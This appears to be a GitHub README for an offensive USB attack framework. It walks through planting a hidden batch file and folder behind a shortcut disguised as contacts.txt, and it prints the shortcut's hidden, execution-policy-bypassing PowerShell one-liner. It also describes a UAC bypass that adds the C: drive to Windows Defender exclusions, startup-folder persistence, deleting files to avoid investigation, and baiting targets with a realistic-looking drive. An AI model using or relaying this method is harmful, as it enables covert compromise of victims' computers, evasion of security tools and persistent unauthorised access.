YouTube Tutorial

An offensive security framework that weaponizes any standard USB Device

This framework is designed to be implemented on any standard USB Drive

This attack takes advantage of the ability to run powershell commands from inside a .lnk file.

The following video is another example of how this method may be implemented.

YouTube Tutorial

After downloading the .Zip file and placing the contents on your USB drive you'll want to delete the ReadMe.md and LICENSE file

Next you will want to make sure the h directory and s1.bat file have the hidden attribute. You do not want these files to be visible to your target.

Now in the Root directory you should have 3 files

• A hidden h directory - Folder containing all the files needed to be moved onto your targets system, and the initial script to be run
• A hidden s1.bat file - A bat file called on by the shortcut to move all the above files and execute the initial script
• A contacts.txt .lnk file (shortcut) - a shortcut phishing file disguised as a text file to entice your target to open it

The h directory will contain 5 more files

• contacts.txt - the actual text file to be opened by the shortcut to convince your target they just opened a regular txt file
• exception.ps1 - A script containing a UAC bypass to open an admin window and add the targets C:/ drive to the windows defender exclusion list. This will prevent further tools you download from being flagged by defender
• intitial.ps1 - This is a script that will be ran one time when the target open the fake text file
• persist.cmd - This is a file added to the start up folder to achieve persistence. It will call on the persist.ps1 file stored in the AppData directory
• persist.ps1 - This is the file that will contain your script that will be run everytime the target boots up their computer

Taking advantage of a little known secret we will be running powershell code embedded in a shortcuts target field as seen in the image below.

This has a few advantages.

• You can't run a regular powershell script by double clicking on it. It will only open it with your default text editor. It will run from a shortcut
• External powershell scripts can not be run without triggering the UAC prompt. We use the shortcut to open their own powershell console we run it from to trick their sytem into thinking it is from a native script.

This is the code in that target text box:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')

YouTube Tutorial

This code will open a powershell console and bypass the execution policy and run our bat file after identifying what drive letter our USB is.

In order for it to find our drive we must change the label of our USB to match the label used in our code in the target text box.

For this example notice the label in the image below and the code above are both 259. This can be changed but they both need to match.

YouTube Tutorial

Once you have all of the above set up you are ready to execute this attack vector

You will want to have 2 payloads ready.

• Your initial payload to be run once this attack has been initiated.

  I use my ADV Recon payload to gather as much info on my target as possible

• The payload you want to be run with persistence at each reboot on your targets PC (This payload will vary depending on your goal)

Once this attack vector has been initiated by your target opening the fake text file link it will open the real hidden txt file in the h directory to avoid suspicion

The shortcut will then run the s1.bat file that will initialize the rest of your scripts.

First your initial payload will run followed by moving your persistance.bat file to the start up directory.

Then your persistence.ps1 file will be added to the AppData folder and run once now and again at each start up.

Finally the real hidden text file will replace your fake txt shortcut link and delete the rest of the files to avoid further investigation into your USB drive

In a real world scenario you would also want to make the USB drive look realistic with a photo album or something else to entice your target to get in contact with you by clicking on the fake contacts.txt file

• An internet connection
• Windows 10,11

(back to top)

(back to top)

All contributors names will be listed here

I am Jakoby

(back to top)

• 0.1
  • Initial Release

(back to top)

YouTube

Twitter

Instagram

Discord

(back to top)

• Hak5
• MG

(back to top)